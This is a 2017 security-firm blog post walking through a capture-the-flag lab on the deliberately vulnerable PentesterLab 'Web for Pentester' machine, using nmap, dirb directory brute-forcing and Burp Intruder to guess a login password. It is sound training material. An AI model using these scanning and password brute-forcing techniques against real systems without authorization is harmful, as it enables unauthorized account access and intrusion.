• Skip to primary navigation
  • Skip to content
  • Skip to primary sidebar
  • Skip to footer

War Room

Shells from above

RSM logo

  • Home
  • About
  • Blog
  • Talks/Whitepapers
  • Tools
  • Recreation
Home > Events > Capture The Flag > CTF Example – Web Application Security Part II

CTF Example – Web Application Security Part II

January 26, 2017 By rascuache

In our previous post, we talked about using robots.txt to uncover hidden information about a target website.

By the end of this post you should be able to:

  • Use dirb to spider a website for directory content
  • Use Burp to attempt a brute forcing attack

You will need the following:

  • Kali Linux virtual machine installed and ready to go
  • The following ISO file found here booted as a device in VMWare (see Hacking Tutorial): https://www.pentesterlab.com/exercises/web_for_pentester/iso

Alright, let’s get started. Find the target IP address of your vulnerable website by doing an ifconfig inside the terminal that pops up. If you can ping that address from your Kali box and get a response, you have your networking set up correctly. If not, you may have to change the network adapter to bridged or host-only and reboot.

Just like in hacking, we will start out by trying to enumerate the services that are actually running on the computer we are attacking.

nmap -sV -p- -v -O <ipaddresshere>

You should receive output similar to the following:

Not shown: 65532 closed ports
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 5.5p1 Debian 6+squeeze3 (protocol 2.0)
80/tcp  open  http    Apache httpd 2.2.16 ((Debian))
389/tcp open  ldap    OpenLDAP 2.2.X - 2.3.X

If you weren’t already aware, most web applications run on ports 80 and 443. It’s possible for them to be on other ports, most commonly 8080, 8443, and 9090, but these are slightly more exotic. You can copy and paste this IP address your browser to see the web application, and you should see a page with the title of Web for Pentester.

Dirb

Hopefully your first instinct was to try and check robots.txt for interesting entries. Although this will usually identify some interesting files and directories, it’s not the case here. We are going to take a much noisier approach this time. On a real penetration test, we would only use this tool as a last resort because it is very easy to detect and has the potential of accidentally crashing a smaller site! In a terminal window, type the following command:

dirb http://<IPADDRESS>

This tool is designed to help a penetration tester identify hidden directories manually. What it does is it takes a list of common directory names and rapidly makes web requests. If the site returns with a code of 404, it will skip it and not output that url. If the code is different, say for example 200 (Status Found), it will then output that as a valid directory. You should be able to browse to some of these directories and find interesting files.

Brute Forcing with Burp

Now open up a new terminal and type burpsuite. Accept the default options and open up your web browser. Burp is what is known as a Web Proxy. This does not mean that it’s something that you use to access blocked games in the library. Instead, it sits in between the requests that you make to the webserver and lets you edit them on the fly before sending them out.

Make sure you change the proxy settings on the IceWeasel web browser to go to the Burp Proxy.

If you configured it correctly, trying to browse to a website will seem like it is not loading. This is normal. What’s happening is you need to manually look at the requests being made in Burp through the Proxy tab.

Now let’s try and see where this could be useful. Navigate to the following URL in your browser and watch what the request looks like:

http:///ldap/example2.php?name=hacker&password=testpassword

For starters, hit the forward button and see what happens. You should notice that the page loads, but it now displays a message that says unauthenticated. Let’s see if we can use this functionality to guess the password of the account named ‘hacker’.

Make the request in the browser again, but this time don’t forward it through. Click inside the text box and change the word after ‘&password=’ to be PIZZA and then forward it on through. It seems like we were able to change what was sent to the website, but our password was still wrong. Now let’s do this at scale.

Make the request one more time, but this time right click and say “send to intruder” or press Ctrl+I.

Clicking on the now-illuminated INTRUDER tab brings you to a new menu. Click on “positions” and you should see your original requested but this time wrapped with funny characters. Click “Clear” to remove this markers. What we want to do is try multiple combinations of passwords on the same user and see which one makes the response change. Highlight the word after ‘&password=” and press “Add” to target this parameter with our wordlist.

When you have it configured as in the screenshot above, click the “Payloads” tab. We want to guess a large list of words, so we can either paste them into the box or load them from a text file. There are numerous ways to get large dictionaries – one of which is rockyou.txt that was discussed in the Hacking blog. Other common guesses include the season followed by the year, sports teams, names, and the username as the password. For now, let’s manually input our guesses:

When you are ready, hit start attack. This will rapidly make these requests and return the resulting response. When you are completely finished, you should see a pane that looks like this:

Notice something interesting? All the failed logins have a length of 1721 but what about that 7th request? The size is different! Click on it to see what the response is:

Looks like we found the right password – the password for hacker is “hacker”.

Next steps

This exercise was adapted from the Pentesterlab.com course. Try your hand at some of the other challenges on this machine so you feel comfortable using different tools!

https://www.pentesterlab.com/exercises/web_for_pentester/course

 

Post Views: 375
Share this...
Email this to someone
email
Share on Facebook
Facebook
Tweet about this on Twitter
Twitter
Share on LinkedIn
Linkedin
Share on Reddit
Reddit

rascuache

Research analyst. Physics geek. Former educator. OSCP

Primary Sidebar

King Phisher Release

Categories

  • Defense
  • Forensics
  • Offense
  • Physical
  • R&D

Most Viewed Posts

  • Sophos UTM Home Edition – 3 – The Setup 10,683 views
  • DLL Injection Part 1: SetWindowsHookEx 10,383 views
  • Leveraging MS16-032 with PowerShell Empire 9,875 views
  • Bypassing Gmail’s Malicious Macro Signatures 9,758 views
  • How to Bypass SEP with Admin Access 8,321 views

Footer

  • RSS
  • Twitter
  • Tools
  • About
  • RSM US LLP

+1 800 903 6264

1 S Wacker Dr Suite 800
Chicago, IL 60606

Copyright © 2019 RSM US LLP. All rights reserved. RSM US LLP is a limited liability partnership and the U.S. member firm of RSM International, a global network of independent audit, tax and consulting firms. The member firms of RSM International collaborate to provide services to global clients, but are separate and distinct legal entities that cannot obligate each other. Each member firm is responsible only for its own acts and omissions, and not those of any other party. Visit for more information regarding RSM US LLP and RSM International.